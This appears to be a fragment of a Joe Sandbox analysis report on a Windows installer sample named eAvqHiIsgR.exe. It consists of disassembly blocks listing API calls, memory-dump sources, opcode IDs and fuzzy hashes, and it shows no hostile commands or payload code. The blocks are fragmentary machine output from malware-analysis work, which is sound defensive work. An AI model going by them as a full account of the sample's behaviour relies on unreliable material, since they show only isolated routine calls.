                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                      • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                      • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                      • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: 04d0138f6b039cfa8a9ae31b9a43d0b8901eade0a551f12f161ca9fbc274c8dc
                                                                      • Instruction ID: 7b04ab45c90008d59928255ff0bd86f27f0ee3e0cc081a618f74c5a3e6f485b2
                                                                      • Opcode Fuzzy Hash: 04d0138f6b039cfa8a9ae31b9a43d0b8901eade0a551f12f161ca9fbc274c8dc
                                                                      • Instruction Fuzzy Hash: 2B51D572D44158AEDB128FBCC9846ADBFB5AB48349F34316BD406E315DCF31D9428761
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                      • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                      • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                      • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                      • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                      • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                      • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                      • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                      • wsprintfA.USER32 ref: 00404A6A
                                                                      • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                      • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                      • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                      • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                      • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-823278215
                                                                      • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                      • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                      • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                      • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                      • GetTickCount.KERNEL32 ref: 00402E6E
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                      • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                      • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                      • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                      APIs
                                                                        • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                        • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                        • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                        • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                      • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                      • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3248276644-823278215
                                                                      • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                      • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                      • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                      • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004051C1
                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                        • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                      • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                      • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                      • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                      • GlobalFree.KERNEL32(0053B8D8), ref: 00403896
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-823278215
                                                                      • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                      • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                      • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                      • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405ADC
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405AEA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1246513382
                                                                      • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                      • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                      • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                      • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 72A4115B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A411B4
                                                                      • GlobalFree.KERNEL32(?), ref: 72A411C7
                                                                      • GlobalFree.KERNEL32(?), ref: 72A411F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: eda68e530c814f571262f754ce6e5a61c14ead4406f397b5d2501887e861c962
                                                                      • Instruction ID: 0c44cbf732d1172e97f41cd839970ba33786fec4d15858de0d30144e15e322eb
                                                                      • Opcode Fuzzy Hash: eda68e530c814f571262f754ce6e5a61c14ead4406f397b5d2501887e861c962
                                                                      • Instruction Fuzzy Hash: 6531B5B29442449FE7018F6DD984B257FF8EB49344B34792DE846C6158DF39E916CB10
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                      • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                      • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                      • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                      • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8